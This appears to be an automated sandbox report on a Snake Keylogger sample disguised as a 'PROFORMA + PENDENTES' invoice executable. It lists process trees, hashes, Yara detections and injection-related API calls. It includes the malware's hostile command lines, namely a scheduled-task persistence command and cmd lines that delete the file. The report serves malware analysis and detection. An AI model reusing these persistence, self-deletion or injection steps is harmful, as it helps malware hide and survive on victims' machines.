Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:18:41
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3E72.tmp"
Imagebase:	0x270000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:18:41
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:18:42
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0x90000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:18:42
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0x2f0000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:18:42
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0x8f0000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000B.00000002.1626917322.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.1630241690.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:18:44
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
Imagebase:	0x5e0000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:18:44
Start date:	18/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	12:18:48
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WYqxTmjfOgdZ" /XML "C:\Users\user\AppData\Local\Temp\tmp5B41.tmp"
Imagebase:	0x270000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:18:48
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:18:48
Start date:	18/11/2024
Path:	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Imagebase:	0x960000
File size:	617'984 bytes
MD5 hash:	4D74CEBD8DDAAE78DE8144F1ABB245E5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.1691929548.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:18:57
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\PROFORMA + PENDENTES.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:18:57
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:18:57
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7b0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:19:03
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:19:03
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:19:03
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /C Y /N /D Y /T 3
Imagebase:	0x7b0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	6.8%
Total number of Nodes:	177
Total number of Limit Nodes:	10

Executed Functions

Function 07081F28 Relevance: .6, Instructions: 630COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ded539f6bb28335f8155a033554ed2aa56b1091e184cca12f592c745fb607d
Instruction ID: d2ff36b1f80f9289a513fcc0e26921b1d57989bdd67f54ab1c729b4e38b988d9
Opcode Fuzzy Hash: 21ded539f6bb28335f8155a033554ed2aa56b1091e184cca12f592c745fb607d
Instruction Fuzzy Hash: EA329BB07012059FDB98EBA4C560BAEB7F6BF88700F244569E146EB791CB35ED01CB51

Function 06E43032 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2728a49eef94e467981bbd3ed243bd25efcd4bcfec092122f51fa24a739988fa
Instruction ID: 56ac3f5c54c405ccde59a1ea084a7e5698b9aa42a879dadb1f717492ab1046a7
Opcode Fuzzy Hash: 2728a49eef94e467981bbd3ed243bd25efcd4bcfec092122f51fa24a739988fa
Instruction Fuzzy Hash: 5BC1A174E042188FDB54DFAAD980A9DFBF2BF89304F24956AD819E7315EB30A941CF50

Function 07080040 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9569b8097b6bd3abfd100ba77dd48cb006894ab0045a6c1bef6931014fa8a7e
Instruction ID: 9e43f2c77eed8e8667de5796f5d4dde11d58b88b466a287fce44dea3c158da7e
Opcode Fuzzy Hash: d9569b8097b6bd3abfd100ba77dd48cb006894ab0045a6c1bef6931014fa8a7e
Instruction Fuzzy Hash: 306127B1D55219CBDB64DF66CC40BEDBBB6AF8A300F10C2EAD45DA6250EB705A85CF40

Function 06E46CE8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c31d4ee291592f022fa7b71b9be98c49931d11cd54dbd6d0cc98120f9ae52eed
Instruction ID: 3ceb611b16634442f83c8743470b13b13ce2d8404e593524807b5e4cba3a4934
Opcode Fuzzy Hash: c31d4ee291592f022fa7b71b9be98c49931d11cd54dbd6d0cc98120f9ae52eed
Instruction Fuzzy Hash: 002117B0D056188FEB08DFA7D9447EEFFF6AF89300F14D06AD409A6264DB7409458FA0

Function 06E4CA3C Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E4CC7E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f79e0b587af726222666030bf2c4274ca9b1875f5e965e0de4c100a72019de9c
Instruction ID: 465a230e495d28a9363f4ac530f84eee9796d483f447801a79861ebdf3cee381
Opcode Fuzzy Hash: f79e0b587af726222666030bf2c4274ca9b1875f5e965e0de4c100a72019de9c
Instruction Fuzzy Hash: A5A17A71D013198FEB60DF68DC41BEEBBB2BF48714F2485A9D809A7284DB749981CF91

Function 06E4CA48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06E4CC7E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 079c7aedb34ffa2b88b9cfede8117a72f409ab4100d1cf9b3f05b3d39b309a85
Instruction ID: 9f1695c18188ef8f20854577d49914b2cfdc4608088e53259ad485aae51523cf
Opcode Fuzzy Hash: 079c7aedb34ffa2b88b9cfede8117a72f409ab4100d1cf9b3f05b3d39b309a85
Instruction Fuzzy Hash: A9917A71D013198FEB60DFA8DC41BEEBBB2BF48714F1485A9D809A7244DB749981CF91

Function 025A44D4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025A59A9

Memory Dump Source

Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9c8a48bc020156fb9f1f313deb242676ad1e3c470d367f1c904152e8773e69ea
Instruction ID: 4e125dcbc54e91695817ef47858aaf4f1743fe54f5fc0dc4b5f611142dc44d8d
Opcode Fuzzy Hash: 9c8a48bc020156fb9f1f313deb242676ad1e3c470d367f1c904152e8773e69ea
Instruction Fuzzy Hash: 8041D470D00719CFDB24DFA9C844B8EBBF6BF89704F60806AD409AB255DB756949CF50

Function 025A58F3 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025A59A9

Memory Dump Source

Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 7465a0cf4f744c6bc46b876d4669cf0a4e4d6ee3dc28f1f7e9c5e1c21f9663ef
Instruction ID: f275ee7b10e36ee3d2b16370c5eb8e92ddcaf359825d496b4963e28fcd891715
Opcode Fuzzy Hash: 7465a0cf4f744c6bc46b876d4669cf0a4e4d6ee3dc28f1f7e9c5e1c21f9663ef
Instruction Fuzzy Hash: 1F41AF70D00719CFEB24DFA9C984BCDBBB2BF89704F60806AD409AB255DB75694ACF50

Function 06E4C7B8 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E4C850

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 13bc640470d58f785dfe8f4f94c21c5f6f3384f8895c571062c37e933711dd2c
Instruction ID: d101690fb45652aa053b5cc974053bb61ec490e7257a410916315e695f223976
Opcode Fuzzy Hash: 13bc640470d58f785dfe8f4f94c21c5f6f3384f8895c571062c37e933711dd2c
Instruction Fuzzy Hash: E52139719003499FDB10DFAAD885BEEBBF5FF48710F108429E518A7240C778A540CFA5

Function 06E4C7C0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06E4C850

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 6ef712bae321738ca7113d12ee3e7cd5dc7b3c6544dc0f4ac5eeb89b0172d694
Instruction ID: 52b9244460b755849acddadd01599824e4aa45769144ee2cc0a51a8e19a055d8
Opcode Fuzzy Hash: 6ef712bae321738ca7113d12ee3e7cd5dc7b3c6544dc0f4ac5eeb89b0172d694
Instruction Fuzzy Hash: 43212671D003499FDB10DFAAD885BDEBBF5FF48710F108429E918A7240C778A950CBA4

Function 06E4C8A8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06E4C930

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: aad6822d304a8bab9e4bc158a8a7debfce2c3be6840e888b70d87793c7a388b6
Instruction ID: e4509a17ee40e6090456be9126346ad52e4a8254e267ace6f980d417bfacb77f
Opcode Fuzzy Hash: aad6822d304a8bab9e4bc158a8a7debfce2c3be6840e888b70d87793c7a388b6
Instruction Fuzzy Hash: 1921F4B18007499FDB10DFAAC885AEEBBF5FF48720F108429E558A7250C779A951CBA4

Function 025ADC70 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025AE5A6,?,?,?,?,?), ref: 025AE667

Memory Dump Source

Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 619b6111076ace48ecbc49ccf8ba7c4ca8d83608eb159ac449ab7fbdfd707ece
Instruction ID: c133e8d28d3af3d9693b019dc41bd2eb8c207684fea83f85a24e18640a700ca1
Opcode Fuzzy Hash: 619b6111076ace48ecbc49ccf8ba7c4ca8d83608eb159ac449ab7fbdfd707ece
Instruction Fuzzy Hash: 2821E4B59002489FDB10CFAAD985ADEBBF9FB48310F14842AE914A3310D378A950CFA4

Function 06E4C1EA Relevance: 1.6, APIs: 1, Instructions: 64
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4C26E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: aefc150dcb6bed9e14258b2fa853134e37497454a56ddaf822b83c75a6a8d6dc
Instruction ID: b8b1eef784433c50023c53d20404d15ea2b2feac7d85ee4e8a3ea20e27ffa262
Opcode Fuzzy Hash: aefc150dcb6bed9e14258b2fa853134e37497454a56ddaf822b83c75a6a8d6dc
Instruction Fuzzy Hash: B5213871D007498FDB10DFAAC8847EEBBF5EF88714F24842AD419A7240CB789945CFA5

Function 06E4C1F0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4C26E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b4dcff25d51a807f327b2a10462e0da6a6c416b09b758fe530bfd52c0172eef6
Instruction ID: 14b8478454863cdfb6bfbe492fddf588372482a5160514e1edbbdf5091f8c567
Opcode Fuzzy Hash: b4dcff25d51a807f327b2a10462e0da6a6c416b09b758fe530bfd52c0172eef6
Instruction Fuzzy Hash: 07213B71D007098FDB50DFAAC8857EEBBF5EF89724F148429D419A7240CB789945CFA4

Function 06E4C8B0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06E4C930

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 6c58086788a7e83ff8c4dcf633a8ca6fac390102fb538589bab17693e06c00a3
Instruction ID: 121e9f14d009ee91f197e721a92c8f43ccdecb9a24e255e48eaa186011404d46
Opcode Fuzzy Hash: 6c58086788a7e83ff8c4dcf633a8ca6fac390102fb538589bab17693e06c00a3
Instruction Fuzzy Hash: CC2116718003499FDB10DFAAC884BEEBBF5FF48720F108429E518A7250C7799941CFA4

Function 06E4C6F8 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06E4C76E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 274b02a5ca6bdf5bfc05c8d25f4f7bcbc2cb2d7cfe35ab88a7db7681c3a63aa5
Instruction ID: 850affa721978430d6d39a533255154fcf08b1e92fe62674c3aee51fe85a9690
Opcode Fuzzy Hash: 274b02a5ca6bdf5bfc05c8d25f4f7bcbc2cb2d7cfe35ab88a7db7681c3a63aa5
Instruction Fuzzy Hash: 041129758043488FDB10DFAAD844BEFBBF6EF88720F248419D515A7250C7759950CFA0

Function 06E4BD00 Relevance: 1.6, APIs: 1, Instructions: 55
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 06E4BD6A

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ba6ab3690904111ee4e9a7000599feada1f064cb0cdc65f3a7d0bdada94da5e2
Instruction ID: 337c8a84f3d6d0337676fbc019924348b60119e8a9d3f4023ad0f928092ff0b8
Opcode Fuzzy Hash: ba6ab3690904111ee4e9a7000599feada1f064cb0cdc65f3a7d0bdada94da5e2
Instruction Fuzzy Hash: 311149718003488FDB20DFAAD4457DEBBF5EF88720F14841AD455A7240CB79A940CFA4

Function 06E4C700 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06E4C76E

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b8ba0edc73e4cf0b89d554c33625571516e25ba7ff4356274a6474733c247965
Instruction ID: 11c5ac3a76227352bf0e4c8faa6c0958ba364e13328af021b286a76f970fcd6b
Opcode Fuzzy Hash: b8ba0edc73e4cf0b89d554c33625571516e25ba7ff4356274a6474733c247965
Instruction Fuzzy Hash: 4B1149718003489FDB10DFAAD844BDFBBF6EF88720F248419E515A7250C779A950CFA0

Function 06E4BD08 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 06E4BD6A

Memory Dump Source

Source File: 00000000.00000002.1492885721.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: a0c68ff0df43fb42c895749df825b511a9e883b59662db094874d459dda9166c
Instruction ID: 855f47f6abd842799d6daa76bd635a1fa29fc438e2c931c4a4459128ae943b95
Opcode Fuzzy Hash: a0c68ff0df43fb42c895749df825b511a9e883b59662db094874d459dda9166c
Instruction Fuzzy Hash: E9112571D003488FDB20DFAAD8457DEFBF9EF88624F24841AD419A7240CB79A940CFA4

Function 070812B0 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07081315

Memory Dump Source

Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 14e1b333a4c443eb1be80ffa2eff539f69ab408c0a6f294e031a5077710f0995
Instruction ID: 0838703173e341584f1e71fe9e84ccfea63c30590834f802c46b2903149126bf
Opcode Fuzzy Hash: 14e1b333a4c443eb1be80ffa2eff539f69ab408c0a6f294e031a5077710f0995
Instruction Fuzzy Hash: 8911F2B58002499FDB20DF9AC884BDEFBF8FB49320F148419E558A7600D379A945CFA1

Function 025AC300 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 025AC366

Memory Dump Source

Source File: 00000000.00000002.1483669720.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25a0000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 551b6a8e939ee5e79462f9198919517a9ddd3e2b589755f8a059d53b28039911
Instruction ID: 331a3e6528e895df47629d553ec2f8f916ff07ba17d847616a9a9a08e17f6d76
Opcode Fuzzy Hash: 551b6a8e939ee5e79462f9198919517a9ddd3e2b589755f8a059d53b28039911
Instruction Fuzzy Hash: 251110B5C003498FDB10CF9AC444BDEFBF5FB89624F10842AD428A7200C3B9A545CFA9

Function 070812B8 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 07081315

Memory Dump Source

Source File: 00000000.00000002.1493042073.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7080000_PROFORMA + PENDENTES.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: b11c620c7baeb146a988b2c09458b452cf01dd41d126342eb3878346135993ed
